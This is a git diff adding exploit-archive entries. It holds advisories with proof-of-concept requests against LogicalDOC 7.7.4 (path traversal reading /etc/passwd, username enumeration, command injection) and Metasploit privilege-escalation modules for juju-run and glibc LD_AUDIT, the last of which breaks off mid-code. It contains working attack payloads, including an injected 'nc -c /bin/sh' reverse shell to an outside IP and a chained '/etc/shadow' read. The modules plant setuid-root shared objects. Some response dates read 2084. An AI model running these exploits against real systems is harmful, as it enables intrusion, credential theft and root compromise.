diff --git a/exploits/java/webapps/44019.txt b/exploits/java/webapps/44019.txt
new file mode 100644
index 000000000..829abfe7c
--- /dev/null
+++ b/exploits/java/webapps/44019.txt
@@ -0,0 +1,111 @@
+LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities
+
+
+Vendor: LogicalDOC Srl
+Product web page: https://www.logicaldoc.com
+Affected version: 7.7.4
+ 7.7.3
+ 7.7.2
+ 7.7.1
+ 7.6.4
+ 7.6.2
+ 7.5.1
+ 7.4.2
+ 7.1.1
+
+Summary: LogicalDOC is a free document management system that is designed
+to handle and share documents within an organization. LogicalDOC is a content
+repository, with Lucene indexing, Activiti workflow, and a set of automatic
+import procedures.
+
+Desc: The application suffers from multiple post-auth file disclosure vulnerability
+when input passed thru the 'suffix' and 'fileVersion' parameters is not properly
+verified before being used to include files. This can be exploited to read arbitrary
+files from local resources with directory traversal attacks.
+
+Tested on: Microsoft Windows 10
+ Linux Ubuntu 16.04
+ Java 1.8.0_161
+ Apache-Coyote/1.1
+ Apache Tomcat/8.5.24
+ Apache Tomcat/8.5.13
+ Undisclosed 8.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5450
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5450.php
+
+
+26.01.2018
+
+---
+
+
+PoC #1:
+
+GET /thumbnail?docId=3375114&random=1517220341243&suffix=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
+Host: localhost:8080
+
+
+Response:
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+[MCI Extensions.BAK]
+3g2=MPEGVideo
+3gp=MPEGVideo
+3gp2=MPEGVideo
+3gpp=MPEGVideo
+aac=MPEGVideo
+adt=MPEGVideo
+adts=MPEGVideo
+m2t=MPEGVideo
+m2ts=MPEGVideo
+m2v=MPEGVideo
+m4a=MPEGVideo
+m4v=MPEGVideo
+mod=MPEGVideo
+mov=MPEGVideo
+mp4=MPEGVideo
+mp4v=MPEGVideo
+mts=MPEGVideo
+ts=MPEGVideo
+tts=MPEGVideo
+
+
+
+PoC #2:
+
+GET /convertpdf?docId=2450&control=preview&fileVersion=../../../../../../etc/passwd HTTP/1.1
+Host: localhozt:8080
+
+
+Response:
+
+HTTP/1.1 200
+Cache-Control: must-revalidate, post-check=0,pre-check=0
+Expires: 0
+Content-Disposition: attachment; filename="=?UTF-8?B?MDkyMDEyMzEwNTVTUFQgMDA0LnBkZi5wZGY=?="
+Pragma: public
+Content-Type: application/pdf;charset=UTF-8
+Content-Length: 964
+Date: Mon, 05 Feb 2018 21:30:59 GMT
+Connection: close
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:100:sync:/bin:/bin/sync
+games:x:5:100:games:/usr/games:/bin/sh
+...
+...
\ No newline at end of file
diff --git a/exploits/java/webapps/44020.txt b/exploits/java/webapps/44020.txt
new file mode 100644
index 000000000..d0e718911
--- /dev/null
+++ b/exploits/java/webapps/44020.txt
@@ -0,0 +1,86 @@
+LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness
+
+
+Vendor: LogicalDOC Srl
+Product web page: https://www.logicaldoc.com
+Affected version: 7.7.4
+ 7.7.3
+ 7.7.2
+ 7.7.1
+ 7.6.4
+ 7.6.2
+ 7.5.1
+ 7.4.2
+ 7.1.1
+
+Summary: LogicalDOC is a free document management system that is designed
+to handle and share documents within an organization. LogicalDOC is a content
+repository, with Lucene indexing, Activiti workflow, and a set of automatic
+import procedures.
+
+Desc: The weakness is caused due to the 'j_spring_security_check' script
+and how it verifies provided credentials. Attacker can use this weakness
+to enumerate valid users on the affected node.
+
+Tested on: Microsoft Windows 10
+ Linux Ubuntu 16.04
+ Java 1.8.0_161
+ Apache-Coyote/1.1
+ Apache Tomcat/8.5.24
+ Apache Tomcat/8.5.13
+ Undisclosed 8.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5451
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php
+
+
+26.01.2018
+
+--
+
+
+Request/response for existent username:
+---------------------------------------
+
+POST /j_spring_security_check HTTP/1.1
+Host: 192.168.1.74:8080
+
+j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
+
+--
+
+HTTP/1.1 302
+Set-Cookie: ldoc-failure=wrongpassword
+Location: //login.jsp?failure=wrongpassword
+Content-Length: 0
+Date: Tue, 06 Feb 2084 19:42:15 GMT
+Connection: close
+
+
+Request/response for non-existent username:
+-------------------------------------------
+
+POST /j_spring_security_check HTTP/1.1
+Host: 192.168.1.74:8080
+
+j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
+
+--
+
+HTTP/1.1 500
+Set-Cookie: JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD; Path=/; Secure; HttpOnly
+Content-Type: text/html;charset=UTF-8
+Content-Length: 78
+Date: Tue, 06 Feb 2084 19:57:14 GMT
+Connection: close
+
+
+
+
ERROR
+
+
\ No newline at end of file
diff --git a/exploits/java/webapps/44021.txt b/exploits/java/webapps/44021.txt
new file mode 100644
index 000000000..48cc2cb04
--- /dev/null
+++ b/exploits/java/webapps/44021.txt
@@ -0,0 +1,103 @@
+LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation
+
+
+Vendor: LogicalDOC Srl
+Product web page: https://www.logicaldoc.com
+Affected version: 7.7.4
+ 7.7.3
+ 7.7.2
+ 7.7.1
+ 7.6.4
+ 7.6.2
+ 7.5.1
+ 7.4.2
+ 7.1.1
+
+Summary: LogicalDOC is a free document management system that is designed
+to handle and share documents within an organization. LogicalDOC is a content
+repository, with Lucene indexing, Activiti workflow, and a set of automatic
+import procedures.
+
+Desc: LogicalDOC suffers from multiple authenticated OS command execution
+vulnerabilities by manipulating the path of the many binaries included in the
+package when changing the settings with their respected arguments. This can be
+exploited to execute local root privilege escalation attack and/or inject and
+execute arbitrary system commands as the root or SYSTEM user depending on the
+platform affected.
+
+Tested on: Microsoft Windows 10
+ Linux Ubuntu 16.04
+ Java 1.8.0_161
+ Apache-Coyote/1.1
+ Apache Tomcat/8.5.24
+ Apache Tomcat/8.5.13
+ Undisclosed 8.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5452
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php
+
+
+26.01.2018
+
+
+
+
+After saving the settings, the command will be executed whenever a user uploads a file
+that was inserted in the 'default.antivirus.includes' list. PoC for antivirus.command:
+--------------------------------------------------------------------------------------
+
+POST /frontend/setting HTTP/1.1
+Host: localhost:8080
+Connection: keep-alive
+Content-Length: 594
+X-GWT-Module-Base: http://localhost:8080/frontend/
+X-GWT-Permutation: 87C7268A2BDB185A47D161B6D6D2DEE8
+Origin: http://localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67
+Content-Type: text/x-gwt-rpc; charset=UTF-8
+Accept: */*
+Referer: http://localhost:8080/frontend.jsp?docId=3735554
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D; JSESSIONID=FCFD7719139A634C8411FD081780BE2A; ldoc-sid=5dd1ea28-36a0-4967-bdd8-2556d16101d7
+
+
+7|0|16|http://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.antivirus.enabled|true|default.antivirus.excludes|*.tif,*.tiff,*.jpg,*.jpeg,*.png,*.bmp,*.gif,*.txt,*.iso|default.antivirus.includes|*.exe,*.com,*.pif,*.scr,*.dll,*.tar.gz|default.antivirus.timeout|0|antivirus.command|c:\\windows\\system32\\calc.exe|1|2|3|4|1|5|5|5|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|
+
+
+
+PoC for call home reverse shell via ocr.Tesseract.path:
+-------------------------------------------------------
+
+POST /frontend/setting HTTP/1.1
+Host: localhost:8080
+
+
+7|0|25|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.ocr.includes|*.pdf,*.tif,*.png,*.jpg,*.txt|default.ocr.excludes|*.odt|default.ocr.text.threshold|1|default.ocr.resolution.threshold|400|ocr.timeout|90|ocr.rendres|180|ocr.rendres.barcode|ocr.batch|2|ocr.engine|Tesseract|ocr.Tesseract.path|nc -c /bin/sh 10.0.0.17 4444|1|2|3|4|1|5|5|10|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|6|0|17|18|6|0|19|18|6|0|20|21|6|0|22|23|6|0|24|25|
+
+
+
+PoC for Key Store via OpenSSL path:
+-----------------------------------
+
+POST /frontend/sign HTTP/1.1
+Host: localhost:8080
+
+
+7|0|14|https://localhost:8080/frontend/|16A5065211C47142C5282B2BC4600F1D|com.logicaldoc.gui.frontend.client.services.SignService|generateNewKeystore|com.logicaldoc.gui.common.client.beans.GUIKeystore/3815185030|java.util.Date/3385151746|1337|/usr/bin/openssl && /usr/bin/cat /etc/shadow|root|O=ZSL,OU=JXY,C=MK|123|#000000|$PAGE_WIDTH/6|5|1|2|3|4|1|5|5|6|WFn2zQZ|A|7|8|9|10|0|11|12|60|100|0|13|14|14|B|2|
+
+
+
+PoC for clients and external apps and services path via command.convert, command.gs, command.openssl, command.pdftohtml, command.keytool:
+-----------------------------------------------------------------------------------------------------------------------------------------
+
+POST /frontend/setting HTTP/1.1
+Host: localhost:8080
+
+
+7|0|35|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|webservice.enabled|true|webdav.enabled|webdav.usecache|false|command.convert|/usr/bin/whoami > test.txt|command.gs|/usr/bin/gs|command.openssl|/usr/bin/openssl|command.pdftohtml|/usr/bin/pdftohtml|command.keytool|1337|cmis.enabled|cmis.changelog|cmis.maxitems|200|default.extcall.enabled|default.extcall.name|External Call|default.extcall.baseurl||default.extcall.suffix|default.extcall.window|_blank|default.extcall.params|user|1|2|3|4|1|5|5|17|6|0|7|8|6|0|9|8|6|0|10|11|6|0|12|13|6|0|14|15|6|0|16|17|6|0|18|19|6|0|20|21|6|0|22|8|6|0|23|8|6|0|24|25|6|0|26|11|6|0|27|28|6|0|29|30|6|0|31|30|6|0|32|33|6|0|34|35|
\ No newline at end of file
diff --git a/exploits/linux/local/44023.rb b/exploits/linux/local/44023.rb
new file mode 100755
index 000000000..ecb7cd0bb
--- /dev/null
+++ b/exploits/linux/local/44023.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Juju-run Agent Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on Juju agent systems
+ running the juju-run agent utility.
+
+ Juju agent systems running agent tools prior to version 1.25.12,
+ 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket
+ to manage software ("units") without setting appropriate permissions,
+ allowing unprivileged local users to execute arbitrary commands as root.
+
+ This module has been tested successfully with Juju agent tools versions
+ 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju
+ 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Ryan Beisner', # Discovery and PoC
+ 'David Ames (@thedac)', # Discovery and PoC
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'DisclosureDate' => 'Apr 13 2017',
+ 'Platform' => [ 'linux' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'References' =>
+ [
+ [ 'CVE', '2017-9232' ],
+ [ 'BID', '98737' ],
+ [ 'URL', 'https://bugs.launchpad.net/juju/+bug/1682411' ]
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('UNIT', [ false, 'A valid Juju unit name', '' ]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ])
+ end
+
+ def check
+ juju_run_path = cmd_exec 'which juju-run'
+
+ if juju_run_path.start_with? '/'
+ vprint_good 'juju-run is installed'
+ return CheckCode::Detected
+ end
+
+ vprint_error 'juju-run is NOT installed'
+
+ CheckCode::Safe
+ end
+
+ def unit_names
+ units = []
+
+ cmd_exec('/bin/ls -m /var/log/juju/*.log').chomp.split(/,\s*/).each do |log|
+ units << ::File.basename(log).gsub(/\.log$/, '')
+ end
+
+ cmd_exec('/bin/ls -m /var/lib/juju/agents/').chomp.split(/,\s*/).each do |agent|
+ units << ::File.basename(agent)
+ end
+
+ units.uniq
+ end
+
+ def execute_command(cmd, opts = {})
+ cmd_exec "juju-run #{opts['unit']} '#{cmd}'"
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ cmd_exec "chmod +x '#{path}'"
+ register_file_for_cleanup path
+ end
+
+ def exploit
+ if check != CheckCode::Detected
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ units = datastore['UNIT'].blank? ? unit_names : [ datastore['UNIT'] ]
+
+ if units.empty?
+ fail_with Failure::Unknown, "Could not find any Juju units. Try specifying a 'UNIT'"
+ end
+
+ # Check each unit for a privileged socket
+ print_status "Trying #{units.size} units..."
+
+ socket_unit = nil
+ unit_names.each do |unit|
+ id = execute_command 'id', 'unit' => unit
+
+ if id.include? 'root'
+ print_good "Unit #{unit.inspect} uses a privileged socket"
+ socket_unit = unit
+ break
+ end
+ end
+
+ if socket_unit.nil?
+ fail_with Failure::NotVulnerable, 'Could not find any Juju units using a privileged socket'
+ end
+
+ # Upload payload executable
+ payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ payload_path = "#{datastore['WritableDir']}/#{payload_name}"
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # Execute payload executable
+ vprint_status 'Executing payload...'
+ execute_command payload_path, 'unit' => socket_unit
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/44024.rb b/exploits/linux/local/44024.rb
new file mode 100755
index 000000000..84e430ad2
--- /dev/null
+++ b/exploits/linux/local/44024.rb
@@ -0,0 +1,232 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Local::Linux
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => "glibc '$ORIGIN' Expansion Privilege Escalation",
+ 'Description' => %q{
+ This module attempts to gain root privileges on Linux systems by abusing
+ a vulnerability in the GNU C Library (glibc) dynamic linker.
+
+ glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
+ properly restrict use of the LD_AUDIT environment variable when loading
+ setuid executables which allows control over the $ORIGIN library search
+ path resulting in execution of arbitrary shared objects.
+
+ This module opens a file descriptor to the specified suid executable via
+ a hard link, then replaces the hard link with a shared object before
+ instructing the linker to execute the file descriptor, resulting in
+ arbitrary code execution.
+
+ The specified setuid binary must be readable and located on the same
+ file system partition as the specified writable directory.
+
+ This module has been tested successfully on glibc version 2.5 on CentOS
+ 5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).
+
+ RHEL 5 is reportedly affected, but untested. Some versions of ld.so,
+ such as the version shipped with Ubuntu 14, hit a failed assertion
+ in dl_open_worker causing exploitation to fail.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Tavis Ormandy', # Discovery and exploit
+ 'Brendan Coles' # Metasploit
+ ],
+ 'DisclosureDate' => 'Oct 18 2010',
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ],
+ [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+ [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'References' =>
+ [
+ [ 'CVE', '2010-3847' ],
+ [ 'BID', '44154' ],
+ [ 'EDB', '15274' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ],
+ [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
+ [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
+ [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ]
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('SUID_EXECUTABLE', [ true, 'Path to a suid executable', '/bin/ping' ]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ])
+ end
+
+ def base_dir
+ datastore['WritableDir']
+ end
+
+ def suid_exe_path
+ datastore['SUID_EXECUTABLE']
+ end
+
+ def check
+ glibc_banner = cmd_exec 'ldd --version'
+ glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+ if glibc_version.eql? ''
+ vprint_error 'Could not determine the GNU C library version'
+ return CheckCode::Safe
+ elsif glibc_version >= Gem::Version.new('2.12.2') ||
+ (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
+ vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
+ return CheckCode::Safe
+ end
+ vprint_good "GNU C Library version #{glibc_version} is vulnerable"
+
+ unless setuid? suid_exe_path
+ vprint_error "#{suid_exe_path} is not setuid"
+ return CheckCode::Detected
+ end
+ vprint_good "#{suid_exe_path} is setuid"
+
+ unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true'
+ vprint_error("#{suid_exe_path} is not readable")
+ return CheckCode::Detected
+ end
+ vprint_good "#{suid_exe_path} is readable"
+
+ CheckCode::Appears
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ cmd_exec "chmod +x '#{path}'"
+ register_file_for_cleanup path
+ end
+
+ def exploit
+ check_status = check
+
+ if check_status == CheckCode::Appears
+ print_good 'The target appears to be vulnerable'
+ elsif check_status == CheckCode::Detected
+ fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable"
+ else
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
+ base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
+ if suid_partition == base_partition
+ vprint_good "'#{suid_exe_path}' and '#{base_dir}' are located on the same partition"
+ else
+ print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition"
+ end
+
+ payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ payload_path = "#{base_dir}/#{payload_name}"
+
+ # Set target
+ uname = cmd_exec 'uname -m'
+ vprint_status "System architecture is #{uname}"
+ if target.name.eql? 'Automatic'
+ case uname
+ when 'x86_64'
+ my_target = targets[2]
+ when /x86/, /i\d86/
+ my_target = targets[1]
+ else
+ fail_with Failure::NoTarget, 'Unable to automatically select a target'
+ end
+ else
+ my_target = target
+ end
+ print_status "Using target: #{my_target.name}"
+
+ cpu = nil
+ case my_target['Arch']
+ when ARCH_X86
+ cpu = Metasm::Ia32.new
+ when ARCH_X64
+ cpu = Metasm::X86_64.new
+ else
+ fail_with Failure::NoTarget, 'Target is not compatible'
+ end
+
+ # Compile shared object
+ so_stub = %|
+ extern int setuid(int);
+ extern int setgid(int);
+ extern int system(const char *__s);
+
+ void init(void) __attribute__((constructor));
+
+ void __attribute__((constructor)) init() {
+ setuid(0);
+ setgid(0);
+ system("#{payload_path}");
+ }
+ |
+
+ begin
+ so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
+ rescue
+ print_error "Metasm encoding failed: #{$ERROR_INFO}"
+ elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
+ elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
+ fail_with Failure::Unknown, 'Metasm encoding failed'
+ end
+
+ # Upload shared object
+ so_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ so_path = "#{base_dir}/#{so_name}"
+ upload_and_chmodx so_path, so
+
+ # Upload exploit
+ link_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ link_path = "#{base_dir}/#{link_name}"
+ fd = rand(10..200)
+ exp = %(
+ rm -rf '#{link_path}'
+ mkdir '#{link_path}'
+ ln #{suid_exe_path} #{link_path}/#{link_name}
+ exec #{fd}< #{link_path}/#{link_name}
+ ls -l /proc/$$/fd/#{fd}
+ rm -rf '#{link_path}'
+ ls -l /proc/$$/fd/#{fd}
+ mv #{so_path} #{link_path}
+ LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd}
+ )
+
+ exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ exp_path = "#{base_dir}/#{exp_name}"
+ upload_and_chmodx exp_path, exp
+ register_file_for_cleanup link_path
+
+ # Upload payload
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # Launch exploit
+ print_status 'Launching exploit...'
+ # The echo at the end of the command is required
+ # else the original session may die
+ output = cmd_exec "#{exp_path}& echo "
+ output.each_line { |line| vprint_status line.chomp }
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/44025.rb b/exploits/linux/local/44025.rb
new file mode 100755
index 000000000..79ecef50a
--- /dev/null
+++ b/exploits/linux/local/44025.rb
@@ -0,0 +1,249 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/local/linux'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Local::Linux
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on Linux systems by abusing
+ a vulnerability in the GNU C Library (glibc) dynamic linker.
+
+ glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
+ properly restrict use of the LD_AUDIT environment variable when loading
+ setuid executables. This allows loading arbitrary shared objects from
+ the trusted library search path with the privileges of the suid user.
+
+ This module uses LD_AUDIT to load the libpcprofile.so shared object,
+ distributed with some versions of glibc, and leverages arbitrary file
+ creation functionality in the library constructor to write a root-owned
+ world-writable file to a system trusted search path (usually /lib).
+ The file is then overwritten with a shared object then loaded with
+ LD_AUDIT resulting in arbitrary code execution.
+
+ This module has been tested successfully on glibc version 2.11.1 on
+ Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386.
+
+ RHEL 5 is reportedly affected, but untested. Some glibc distributions
+ do not contain the libpcprofile.so library required for successful
+ exploitation.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Tavis Ormandy', # Discovery and exploit
+ 'zx2c4', # "I Can't Read and I Won't Race You Either" exploit
+ 'Marco Ivaldi', # raptor_ldaudit and raptor_ldaudit2 exploits
+ 'Todor Donev', # libmemusage.so exploit
+ 'Brendan Coles' # Metasploit
+ ],
+ 'DisclosureDate' => 'Oct 18 2010',
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ],
+ [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+ [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'References' =>
+ [
+ [ 'CVE', '2010-3847' ],
+ [ 'CVE', '2010-3856' ],
+ [ 'BID', '44154' ],
+ [ 'BID', '44347' ],
+ [ 'EDB', '15274' ],
+ [ 'EDB', '15304' ],
+ [ 'EDB', '18105' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/344' ],
+ [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
+ [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
+ [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3856' ],
+ [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ],
+ [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3856' ]
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/bin/ping' ]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ])
+ end
+
+ def base_dir
+ datastore['WritableDir']
+ end
+
+ def suid_exe_path
+ datastore['SUID_EXECUTABLE']
+ end
+
+ def check
+ glibc_banner = cmd_exec 'ldd --version'
+ glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+ if glibc_version.to_s.eql? ''
+ vprint_error 'Could not determine the GNU C library version'
+ return CheckCode::Safe
+ elsif glibc_version >= Gem::Version.new('2.12.2') ||
+ (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
+ vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
+ return CheckCode::Safe
+ end
+ vprint_good "GNU C Library version #{glibc_version} is vulnerable"
+
+ lib = 'libpcprofile.so'
+ @lib_dir = nil
+ vprint_status "Checking for #{lib} in system search paths"
+ search_paths = cmd_exec "env -i LD_PRELOAD=#{rand_text_alpha rand(10..15)} LD_DEBUG=libs env 2>&1 | grep 'search path='"
+ search_paths.split('path=')[1..-1].join.split(':').each do |path|
+ lib_dir = path.to_s.strip
+ next if lib_dir.eql? ''
+ libs = cmd_exec "ls '#{lib_dir}'"
+ if libs.include? lib
+ @lib_dir = lib_dir
+ break
+ end
+ end
+ if @lib_dir.nil?
+ vprint_error "Could not find #{lib}"
+ return CheckCode::Safe
+ end
+ vprint_good "Found #{lib} in #{@lib_dir}"
+
+ unless setuid? suid_exe_path
+ vprint_error "#{suid_exe_path} is not setuid"
+ return CheckCode::Detected
+ end
+ vprint_good "#{suid_exe_path} is setuid"
+
+ CheckCode::Appears
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ cmd_exec "chmod +x '#{path}'"
+ register_file_for_cleanup path
+ end
+
+ def on_new_session(client)
+ # remove root owned shared object from system load path
+ if client.type.eql? 'meterpreter'
+ client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
+ client.fs.file.rm @so_path
+ else
+ client.shell_command_token "rm #{@so_path}"
+ end
+ end
+
+ def exploit
+ check_status = check
+
+ if check_status == CheckCode::Appears
+ print_good 'The target appears to be vulnerable'
+ elsif check_status == CheckCode::Detected
+ fail_with Failure::BadConfig, "#{suid_exe_path} is not suid"
+ else
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ payload_path = "#{base_dir}/#{payload_name}"
+
+ # Set target
+ uname = cmd_exec 'uname -m'
+ vprint_status "System architecture is #{uname}"
+ if target.name.eql? 'Automatic'
+ case uname
+ when 'x86_64'
+ my_target = targets[2]
+ when /x86/, /i\d86/
+ my_target = targets[1]
+ else
+ fail_with Failure::NoTarget, 'Unable to automatically select a target'
+ end
+ else
+ my_target = target
+ end
+ print_status "Using target: #{my_target.name}"
+
+ cpu = nil
+ case my_target['Arch']
+ when ARCH_X86
+ cpu = Metasm::Ia32.new
+ when ARCH_X64
+ cpu = Metasm::X86_64.new
+ else
+ fail_with Failure::NoTarget, 'Target is not compatible'
+ end
+
+ # Compile shared object
+ so_stub = %|
+ extern int setuid(int);
+ extern int setgid(int);
+ extern int system(const char *__s);
+
